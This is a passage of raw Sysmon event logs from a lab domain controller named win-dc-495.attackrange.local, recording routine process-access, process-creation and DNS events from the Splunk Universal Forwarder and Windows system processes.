Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:26.392{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E62-6005-7400-00000000A301}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:26.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:26.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:26.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:26.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:26.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:26.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:26.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:26.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:26.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:26.392{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E62-6005-7400-00000000A301}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:26.392{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E62-6005-7400-00000000A301}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:26.195{59A5CD1D-8E62-6005-7400-00000000A301}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.200{59A5CD1D-8E56-6005-2800-00000000A301}2696WIN-DC-4950fe80::16d:d52:d54:cffc;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.200{59A5CD1D-8E56-6005-2800-00000000A301}2696WIN-DC-495010.0.1.14;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.011{59A5CD1D-8E56-6005-2800-00000000A301}2696WIN-DC-4950fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\spoolsv.exe 10341000x80000000000000002531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.939{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E63-6005-7600-00000000A301}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.939{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E63-6005-7600-00000000A301}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.923{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E63-6005-7600-00000000A301}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 